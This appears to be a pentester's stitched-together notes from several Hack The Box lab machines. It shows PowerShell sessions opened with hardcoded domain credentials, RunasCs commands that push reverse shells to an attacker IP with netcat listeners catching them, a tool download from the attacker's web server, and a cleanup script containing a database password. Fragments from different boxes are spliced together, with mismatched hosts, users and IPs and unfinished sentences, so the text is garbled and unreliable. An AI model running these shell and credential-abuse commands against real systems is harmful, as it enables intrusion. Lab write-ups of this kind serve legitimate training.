┌──(puck㉿kali)-[~/htb/thefrizz]
└─$ cat getshell.ps1
$username = 'FRIZZ\f.frizzle'
$password = 'Jenni_Luvs_Magic23!'
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential -ArgumentList $username,$securePassword
New-PSSession -Credential $credential | Enter-PSSession
┌──(puck㉿kali)-[~/htb/thefrizz]

PS C:\programdata> .\RunasCs.exe puck 'Start123!' -l 8 "rcat_10.10.14.3_443.exe"
.\RunasCs.exe puck 'Start123!' -l 8 "rcat_10.10.14.3_443.exe"
[*] Warning: User profile directory for user puck does not exists. Use --force-profile if you want to force the creation.
[*] Warning: The function CreateProcessWithLogonW is not compatible with the requested logon type '8'. Reverting to the Interactive logon type '2'. To force a specific logon type, use the flag combination --remote-impersonation and --logon-type.
[*] Warning: The logon for user 'puck' is limited. Use the flag combination --bypass-uac and --logon-type '8' to obtain a more privileged token.

┌──(puck㉿kali)-[~/htb/absolute]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.11.181] 64601
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
absolute\puck
Still to try
RunasCs
The RunasCs project aims to create a binary like runas.exe but without limitations:
- Allows explicit credentials
- Works both if spawned from interactive process and from service process
- Manage properly DACL for Window Stations and Desktop for the creation of the new process
- Uses more reliable create process functions like CreateProcessAsUser() and CreateProcessWithTokenW() if the calling process holds the required privileges (automatic detection)
- Allows to specify the logon type, e.g. 8-NetworkCleartext logon (no UAC limitations)
- Allows to bypass UAC when an administrator password is known (flag --bypass-uac)
- Allows redirecting stdin, stdout and stderr to a remote host
- It’s Open Source 🙂
It’s from one of the authors of the Potato exploits, and a really nice tool to have.
I’ll download the latest release, host it with a Python web server, and upload it to Flight:
C:\ProgramData>powershell -c wget 10.10.14.3:8000/RunasCs.exe -outfile r.exe
Now I’ll invoke a cmd.exe as C.Bun using -r to redirect STDIN/STDOUT to my host:
C:\ProgramData>r.exe m.schoolbus !suBcig@MehTed!R -r 10.10.14.3:443 cmd
[*] Warning: Using function CreateProcessWithLogonW is not compatible with logon type 8. Reverting to logon type Interactive (2)...
[+] Running in session 0 with process function CreateProcessWithLogonW()
[+] Using Station\Desktop: Service-0x0-5ea78$\Default
[+] Async process 'cmd' with pid 4508 created and left in background.
C:\ProgramData>
With nc listening on my box, there’s a connection:
┌──(puck㉿kali)-[~/htb/flight]
└─$ rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.4] from (UNKNOWN) [10.10.11.187] 50043
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
flight\c.bum
C:\Windows\system32>
I can now get user.txt:
Beyond root : Cleanup script
PS C:\users\Administrator\Desktop> type cleanup.ps1
type cleanup.ps1
get-gpo -all|where {$_.Owner -ne "frizz\Domain Admins"}|%{write-host "removing gpo $($_.displayname)";$_|remove-gpo}
$names=@(
'i18n',
'installer',
'lib',
'modules',
'resources',
'src',
'themes',
'uploads',
'vendor',
'.htaccess',
'CHANGEDB.php',
'CHANGELOG.txt',
'composer.json',
'composer.lock',
'config.php',
'error.php',
'export.php',
'favicon.ico',
'fullscreen.php',
'functions.php',
'gibbon.php',
'gibbon.sql',
'gibbon_demo.sql',
'index.php',
'indexExport.php',
'indexFindRedirect.php',
'index_fastFinder_ajax.php',
'index_notification_ajax.php',
'index_notification_ajax_alarm.php',
'index_notification_ajax_alarmConfirmProcess.php',
'index_notification_ajax_alarmProcess.php',
'index_notification_ajax_alarm_tickUpdate.php',
'index_parentPhotoDeleteProcess.php',
'index_parentPhotoUploadProcess.php',
'index_tt_ajax.php',
'keepAlive.php',
'LICENSE',
'login.php',
'logout.php',
'notifications.php',
'notificationsActionProcess.php',
'notificationsDeleteAllProcess.php',
'notificationsDeleteProcess.php',
'passwordReset.php',
'passwordResetProcess.php',
'preferences.php',
'preferencesPasswordProcess.php',
'preferencesProcess.php',
'privacyPolicy.php',
'publicRegistration.php',
'publicRegistrationCheck.php',
'publicRegistrationProcess.php',
'README.md',
'report.php',
'robots.txt',
'roleSwitcherProcess.php',
'update.php',
'version.php',
'yearSwitcherProcess.php'
)
get-item c:\frizz-builder|remove-item -recurse -force
gci c:\xampp\htdocs\gibbon-LMS\|%{if($names -notcontains $_.name){write-host "removing $($_.name)";$_|remove-item -recurse}}
$date = get-date -f "yyyy-MM-dd"
start-process -FilePath 'c:\xampp\mysql\bin\mysql.exe' -ArgumentList ("-uMrGibbonsDB -pMisterGibbs!Parrot!?1 -e `"update gibbon.gibbonMessenger SET messageWall_date1='$date';`"")
$names=@(
'Gibbon-LMS',
'home'
)
gci c:\xampp\htdocs\|%{if($names -notcontains $_.name){write-host "removing $($_.name)";$_|remove-item -recurse}}
get-adcomputer -filter * | where {$_.name -ne "frizzdc"}|remove-adcomputer -confirm:$false
PS C:\users\Administrator\Desktop>
…